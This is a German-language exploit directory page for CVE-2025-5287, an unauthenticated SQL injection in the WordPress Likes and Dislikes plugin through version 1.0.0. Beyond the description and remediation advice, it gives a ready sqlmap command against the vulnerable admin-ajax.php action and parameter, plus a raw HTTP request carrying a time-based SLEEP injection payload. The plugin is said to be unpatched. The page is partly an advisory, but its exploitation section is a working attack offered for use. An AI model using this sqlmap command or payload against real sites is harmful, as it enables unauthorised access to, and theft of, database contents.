Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5287 — WordPress Likes and Dislikes Plugin <= 1.0.0 ist anfällig für SQL-Injection | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-5287
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-5287

CVE-2025-5287

WordPress Likes and Dislikes Plugin <= 1.0.0 ist anfällig für SQL-Injection

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔥 WordPress Likes and Dislikes Plugin ≤ 1.0.0 – Nicht authentifizierte SQL-Injection

🧠 CVE-ID: CVE-2025-5287

Entdeckt von: Khaled_Alenazi (Nxploited)
Veröffentlicht am: 27. Mai 2025


📋 Beschreibung

Das Likes and Dislikes Plugin für WordPress ist in allen Versionen bis einschließlich 1.0.0 anfällig für SQL-Injection über den post-Parameter.
Aufgrund unzureichender Escaping und fehlender Prepared Statements können nicht authentifizierte Angreifer rohes SQL in Backend-Abfragen einschleusen, was zu Datenlecks oder -manipulation führt.


🧬 Technische Details

  • Angreifbarer Parameter: post
  • Verwundbarkeitstyp: SQL-Injection (Boolean-based und Time-based)
  • HTTP-Methode: POST
  • Betroffener Endpunkt: /wp-admin/admin-ajax.php
  • Patch-Status: ❌ Nicht behoben
  • Erforderliche Berechtigungen: Keine (nicht authentifiziert)
  • CVSS-Score: 9.3 (Hoch)
  • OWASP Top 10: A1 – Injection

💥 Ausnutzung

✅ SQLMap-Befehl (Time-based Blind SQLi):

sqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs

Dieser Befehl bestätigt die Injectionsstelle und zählt Datenbanken mithilfe einer zeitbasierten Technik auf.

🧪 POC-Payload (Manuell – Time-based):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close

action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like

🧪 Nachweiszusammenfassung

  1. SQLMap-Enumeration:

    • Erkannte boolean-based blind und time-based blind SQLi.
    • Backend als MySQL bestätigt.
    • Datenbanken aufgezählt: db, test, information_schema.

    SQLMap-Nachweis

  2. Manuelle Überprüfung mit Burp Suite:

    • HTTP-Antwortverzögerung durch zeitbasiertes Payload bestätigt.
    • Verzögerung überstieg 15 Sekunden, was auf echte Injection hinweist.

    Burp Suite-Nachweis


⚠️ Risiken

  • CVSS-Schweregrad: 9.3 (Hoch)
  • Diese Schwachstelle kann verwendet werden, um ohne Authentifizierung sensible Daten zu extrahieren.

🔗 Referenzen

  • https://patchstack.com/database/wordpress/plugin/inprosysmedia-likes-dislikes-post/vulnerability/wordpress-likes-and-dislikes-plugin-plugin-1-0-0-unauthenticated-sql-injection-vulnerability
  • https://nvd.nist.gov/vuln/detail/CVE-2025-5287

🛡️ Empfehlungen

  • Eingaben aus post sofort bereinigen und parametrisieren.
  • Prepared Statements verwenden.
  • WAF und Rate-Limiting implementieren, um Brute-Force-Injectionsversuche zu reduzieren.

⚠️ Haftungsausschluss

Dieser Inhalt dient ausschließlich zu Bildungs- und Forschungszwecken.
Der Autor billigt keine böswilligen Aktivitäten oder die Ausnutzung von Systemen ohne ausdrückliche Genehmigung.


👤 Autor

Khaled_Alenazi (Nxploited)

Tool herunterladen